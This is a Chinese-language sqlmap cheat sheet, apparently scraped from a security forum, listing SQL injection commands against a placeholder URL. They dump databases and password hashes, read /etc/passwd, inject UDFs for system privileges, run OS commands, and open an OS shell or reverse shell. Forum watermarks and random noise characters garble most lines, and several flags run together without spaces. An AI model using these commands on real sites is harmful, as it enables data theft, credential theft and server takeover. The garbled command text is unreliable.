sqlmap使用笔记

sqlmap -u "http://url/news?id=1" --level=3 --smart --dbms "Mysql" --current-user #获取当前用户名称
- 专注网络安全- p, Z( Q% {/ o, J% |
sqlmap -u "http://www.xxoo.com/news?id=1" --level=3 --smart --dbms "Mysql" --current-db  #获取当前数据库名称
- 专注网络安全! J+ M9 : U( V* o& g8 W
sqlmap -u "http://www.xxoo.com/news?id=1" --level=3 --smart --dbms "Mysql"--tables  -D "db_name" #列表名www.t00ls.net5 m: I) k+ Z. G7 b8 x

sqlmap -u "http://url/news?id=1" --level=3 --smart  --dbms "Mysql" --columns -T "tablename" users-D "db_name" -v 0 #列字段
www.t00ls.net. i9 ], n: y; t5 K$ R
sqlmap -u "http://url/news?id=1" --level=3 --smart --dbms "Mysql"  --dump  -C "column_name"  -T "table_name" -D "db_name" -v 0   #获取字段内容 - 专注网络安全9 T& F$ ?7 P) C/ s+ f3 Q
- 低调求发展, f8 s/ i4 ~# r9 j% J

www.t00ls.net8 T2 ?* h. N! v! y2 [: F
******************信息获取******************

sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql" --users  #列数据库用户T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security, u$ O3 A- ^( m8 k' B# K
- 专注网络安全. A5 M: O: d7
sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql" --dbs#列数据库www.t00ls.net4 D1 g& l' R- h: B4 t8 b

sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql"--passwords #数据库用户密码www.t00ls.net0 E! H. r" j1 u# D; S

sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql"--passwords-U root  -v 0 #列出指定用户数据库密码 - 专注网络安全$ {- j( ~) s9 D3 J0 s

sqlmap -u "http://url/news?id=1"  --dbms "Mysql"  --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20  #列出指定字段，列出20条

T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security5 ?% D9 T# b( q5 ]/ ~4 w
sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql" --dump-all -v 0 #列出所有数据库所有表9 e5 o8 q8 `6 {  q
T00LS& |  x3 {9 Z* A!
sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql"--privileges #查看权限
www.t00ls.net+ 2 D, ^2 n2 T, ^, ~9 i
sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql"--privileges -U root #查看指定用户权限& x( q' H5 D! i6 T0 Y: h+ ^6 z
- 低调求发展; B/ @/ Y0 O6 m$ S4 K. a- l
sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql" --is-dba -v 1 #是否是数据库管理员 - 专注网络安全+ G! P& v2 E9 X; V. e: T0 L
: & |* u; Q4 l
sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql" --roles #枚举数据库用户角色www.t00ls.net' ^+ W% o( o3 a: : S/ V2 T- O. I8 S
www.t00ls.net. l' W4 n" P5 o# M, p
sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql"--udf-inject #导入用户自定义函数（获取系统权限！）T00LS+ F8 q$ f0 q; C1 ?: w/ p

sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql"--dump-all --exclude-sysdbs -v 0 #列出当前库所有表 - 低调求发展7 R' x4 L6 B0 @' i
- 低调求发展, a; S& w3 E6 7
sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql"--union-cols #union 查询表记录
www.t00ls.net; Y! L% g0 U& g8 p4 v
sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql"--cookie "COOKIE_VALUE" #cookie注入

sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql"-b #获取banner信息T00LS9 f+ W4 c& ^' x1 s# G8 A* P8 l
www.t00ls.net( i" A( h- E9 `- & H
sqlmap -u "http://url/news?id=1" --data "id=3"  #post注入
- 专注网络安全* U8 r7 m& M" ^, P* V1 Z
sqlmap -u "http://url/news?id=1" --level=3 --smart-v 1 -f #指纹判别数据库类型
- 低调求发展- V7 s! J! |5 W* o* q( f, l  {
sqlmap -u "http://url/news?id=1" --level=3 --smart--proxy"http://127.0.0.1:8118" #代理注入T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security  l% K; Q% s, K! b/ a  t. M

sqlmap -u "http://url/news?id=1"--string"STRING_ON_TRUE_PAGE"  #指定关键词 - 专注网络安全" c' ^( I# F4 }: J! D

sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql"--sql-shell #执行指定sql命令" x/ B2 H9 L* f; {  g
T00LS, Z0 J' y0 C: q: i+ X  Q4 r0 w
sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql"--file /etc/passwdwww.t00ls.net0 ~# g) x# P& 4 l6 P

sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql"--os-cmd=whoami #执行系统命令

sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql"--os-shell #系统交互shell - 低调求发展5 _) h5 _( T4 d3 B0 C' m
T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security5 Y& d; C6 v% Q0 ) q
sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql"--os-pwn #反弹shell

sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql"--reg-read #读取win系统注册表 - 专注网络安全  |" _; q  t; A* Z7 T& f* k$ E; t
- 低调求发展: d6 K4 V8 r& R+ Y
sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql" --dbs-o "sqlmap.log" #保存进度+ T$ V4 ~: u: a+ b
www.t00ls.net( y9 `0 j2 Z; ?) w" _& E
sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql" --dbs  -o "sqlmap.log" --resume  #恢复已保存进度& E) I' J- v  ~! R+ h